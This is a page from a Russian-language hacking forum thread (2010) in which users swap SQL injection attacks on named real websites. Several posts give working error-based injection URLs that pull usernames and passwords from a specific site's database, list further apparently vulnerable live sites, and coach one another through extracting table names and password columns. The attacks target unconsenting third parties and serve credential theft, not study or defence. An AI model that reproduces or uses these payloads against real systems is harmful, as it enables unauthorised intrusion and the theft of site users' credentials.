HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1577 из 2438 « Первая < 5771077147715271567 1573 1574 1575 1576 1577 1578 1579 1580 1581 1587162716772077 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #15761  
Старый 04.12.2010, 23:33
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
FlaktW

http://www.alestilocuquita.com/descripcion.php?id=-347' and(select 1 from(select count(*),concat((select (select (SELECT concat_ws(0x3a,usuarios.usuario,usuarios.clave) FROM `orlando_cuiquita`.usuarios LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1

Дальше перебирай лимитом юзверов
 
Ответить с цитированием

  #15762  
Старый 05.12.2010, 13:43
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию
А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?
 
Ответить с цитированием

  #15763  
Старый 06.12.2010, 02:21
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию
Можно ли что то сделать в таких случаях

http://www.omelhordamoda.com.br/modafeminina.asp?CatID=80%27

http://www.siliconaction.com.br/registro/secao.mv?nomearquivo=[]

http://rasta.com.br/loja/index.php?page=shop.product_details%27&flypagep[]=shop.flypage%27&product_id=4685%27&category_id=8% 27&manufacturer_id=0%27&option=com_virtuemart&Item id=1%27
 
Ответить с цитированием

  #15764  
Старый 06.12.2010, 02:42
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию
[Ozzi]

В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'

БД - MSAccess

Вот статья про эту субд /threadnav50550-1.html

А в остальных 2ух просто раскрытие я так понял.

Цитата:
Сообщение от fl00der  
fl00der said:
А вот вопрос, когда есть стандартная инъекция, то нельзя ли в подзапросе выполнить UPDATE?
Нет,нельзя.Апдейт встречается довольно редко,также как и обход авторизации.
 
Ответить с цитированием

  #15765  
Старый 06.12.2010, 16:42
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию
Цитата:
Сообщение от ~d0s~  
~d0s~ said:
[Ozzi]
В первом случае - скуля http://www.omelhordamoda.com.br/modafeminina.asp?CatID=1'
БД - MSAccess
Вот статья про эту субд /threadnav50550-1.html
Почитал попробовал но чет не раскручивается (
 
Ответить с цитированием

  #15766  
Старый 06.12.2010, 22:21
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию
Как переделать этот запрос

' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --

так что б он вывел table_name из information_schema
 
Ответить с цитированием

  #15767  
Старый 06.12.2010, 22:37
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию
Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
Как переделать этот запрос
' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2))) --

так что б он вывел table_name из information_schema
' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1
 
Ответить с цитированием

  #15768  
Старый 06.12.2010, 22:46
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию
Цитата:
Сообщение от Фараон  
Фараон said:
' or 1 group by concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2)) having min(0) or 1 -- 1

Ступил.. Спасибо!!!
 
Ответить с цитированием

  #15769  
Старый 07.12.2010, 01:23
[Ozzi]
Guest
Сообщений: n/a
Провел на форуме:
4532

Репутация: -1
По умолчанию
Делаю такой запрос

Код:
Code:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так

Код:
Code:
select логин  from User -
меня бросает на главную страницу почему?
 
Ответить с цитированием

  #15770  
Старый 07.12.2010, 01:29
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию
Цитата:
Сообщение от [Ozzi  
"]
[Ozzi] said:
Делаю такой запрос
Код:
Code:
select column_name from information_schema.columns where table_name='User'
мне выдает там 5 значенй логин пароль и тд , делаю дальше так
Код:
Code:
select логин  from User -
меня бросает на главную страницу почему?
Проверьте количество записей:

Код:
Code:
select count(*) from User
Потом проверь, в какой базе таблица:

Код:
Code:
select table_schema from information_schema.tables where table_name='User'
Потом запросом:

Код:
Code:
select password from table_schema.User -
Выводи данные

Линк скинь.
 
Ответить с цитированием
Ответ
Страница 1577 из 2438 « Первая < 5771077147715271567 1573 1574 1575 1576 1577 1578 1579 1580 1581 1587162716772077 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ